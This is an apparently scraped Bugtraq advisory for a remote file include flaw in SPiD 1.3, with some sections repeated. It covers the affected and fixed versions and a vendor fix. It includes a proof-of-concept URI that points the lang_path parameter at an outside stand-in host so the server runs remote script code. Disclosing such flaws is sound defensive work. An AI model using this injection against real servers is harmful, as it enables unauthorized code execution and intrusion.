Spid lang_path File Include Vulnerability
BID:14208
Info
Spid lang_path File Include Vulnerability
| Bugtraq ID: | 14208 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 11 2005 12:00AM |
| Updated: | Jul 11 2005 12:00AM |
| Credit: | Credit for discovery of this vulnerability is given to skdaemon porra <[email protected]>. |
| Vulnerable: |
SPiD SPiD 1.3 |
| Not Vulnerable: |
SPiD SPiD 1.3.1 |
Discussion
Spid lang_path File Include Vulnerability
SPiD is a gallery management application written in PHP.
SPiD is prone to a remote file include vulnerability, due to lack of validation of user input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
SPiD is a gallery management application written in PHP.
SPiD is prone to a remote file include vulnerability, due to lack of validation of user input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
Spid lang_path File Include Vulnerability
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/SPiD/lang/lang.php?lang_path=http://www.example.com
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/SPiD/lang/lang.php?lang_path=http://www.example.com
Solution / Fix
Spid lang_path File Include Vulnerability
Solution:
The vendor has addressed this issue in SPiD version 1.3.1:
SPiD SPiD 1.3
Solution:
The vendor has addressed this issue in SPiD version 1.3.1:
SPiD SPiD 1.3
-
SPiD spid-1.3.1.zip
http://spid.adnx.net/spid-1.3.1.zip